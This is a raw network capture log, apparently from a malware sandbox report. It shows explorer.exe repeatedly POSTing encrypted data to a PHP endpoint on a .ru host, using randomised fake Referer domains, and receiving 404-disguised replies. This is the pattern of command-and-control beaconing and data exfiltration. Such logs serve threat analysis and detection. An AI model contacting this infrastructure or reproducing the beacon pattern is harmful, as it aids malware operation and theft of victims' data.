Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49955	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:54.635824919 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ucebrpsptgm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 184 Host: nwgrus.ru
Oct 3, 2024 23:27:54.635843992 CEST	184	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 2f 57 fa eb Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vu/WT0xbK1]H7;nd.x$k8~&<,JK=NIvV@p&FH\|3Q
Oct 3, 2024 23:27:56.022731066 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:55 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49962	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:56.031805992 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wvyisbukobdqdei.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 330 Host: nwgrus.ru
Oct 3, 2024 23:27:56.031821012 CEST	330	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 7b 3c ca e3 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vu{<V$dIX(</VnyCqTw2zI+g.P?HE-Tvg'X!H\D,eBb,vHCk)7=kKS
Oct 3, 2024 23:27:57.406315088 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49973	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:57.428765059 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kymcsuriadoaei.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 266 Host: nwgrus.ru
Oct 3, 2024 23:27:57.428776979 CEST	266	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 31 42 d8 82 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vu1BEUz\|~X(dykKGl8.^g&5L7IMx@ hW89`4O,sqRJD^"yt~Mf(JP-rTY
Oct 3, 2024 23:27:58.837547064 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:58 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49983	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:58.846816063 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wypsmdkfdcadpn.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 254 Host: nwgrus.ru
Oct 3, 2024 23:27:58.846834898 CEST	254	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 50 08 fe e2 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vuPDdx&cXM`qLF6u7\|DM{a,#yhjZHb?u'wT9W: OR+XkgUt$\7k
Oct 3, 2024 23:28:00.557234049 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:28:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49995	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:28:00.566323996 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://erjyaeignxsu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 334 Host: nwgrus.ru
Oct 3, 2024 23:28:00.566323996 CEST	334	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 79 25 ed ea Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vuy%lGn".?'Ulnf2)9e-FMaD3{%AQ49\|[`%vRx;z],r).
Oct 3, 2024 23:28:01.961266041 CEST	189	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:28:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50001	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:28:03.321330070 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mcjitqwtqilsk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 305 Host: nwgrus.ru
Oct 3, 2024 23:28:03.321346045 CEST	305	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1d 6b 2c 90 f4 76 0b 75 59 0c b4 87 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA ,[k,vuY:TAzEsOw6;s/So%-W9,$cjK'Nfr9<@@<IFm>6?[SS!#jCl\KY;_`?\|+s
Oct 3, 2024 23:28:04.717483997 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:28:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50002	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:28:04.747276068 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cweiuociftg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 274 Host: nwgrus.ru
Oct 3, 2024 23:28:04.747324944 CEST	274	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 54 0b ae 88 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vuTiZX}[xjgf9vX@i[vzDOpt(n\X@%x!@0TD VUqfvx?t{lO&/
Oct 3, 2024 23:28:06.105165005 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:28:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50003	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:28:06.115504026 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ncmvgkvwguax.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 181 Host: nwgrus.ru
Oct 3, 2024 23:28:06.115504026 CEST	181	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 38 01 e1 fb Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vu8>Wcg*JDLxWk;;Ij`3"I/<2^Y\|B#p,R^aSLc
Oct 3, 2024 23:28:07.783315897 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:28:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50022	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:29:16.018275023 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://trelswnfdtmn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 130 Host: nwgrus.ru
Oct 3, 2024 23:29:16.018275023 CEST	130	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5c 41 eb a8 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA .[k,vu\Af)zwweDg) -^E#5`Z3
Oct 3, 2024 23:29:17.365068913 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:29:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50023	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:29:22.479424953 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mltvlrabpgii.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 226 Host: nwgrus.ru
Oct 3, 2024 23:29:22.479453087 CEST	226	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 39 cc 9e Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA .[k,vuU93pA2UrlxccM8%u5I#n<*,f.\X7X:"x(,;(7[RO7
Oct 3, 2024 23:29:23.861526012 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:29:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50024	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:29:30.838433027 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wfqqxnqsmcop.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 251 Host: nwgrus.ru
Oct 3, 2024 23:29:30.838433027 CEST	251	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5f 33 ee 80 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA .[k,vu_3_.wy{#s}DE6`\6kt>^T1_HcI>~G%w_7btw:.3cZr[ymwo8=
Oct 3, 2024 23:29:32.215879917 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:29:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50025	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:29:42.053097963 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gottjuiosjatm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 281 Host: nwgrus.ru
Oct 3, 2024 23:29:42.053114891 CEST	281	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4b 20 e2 8b Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA .[k,vuK dCXPkO?1*W@d\|G$@7NN:Nob:B'h7hGE:[/:q>_]vZVor{`E?m
Oct 3, 2024 23:29:43.489607096 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:29:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50026	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:29:53.007772923 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sgntleolvdwaddkp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 195 Host: nwgrus.ru
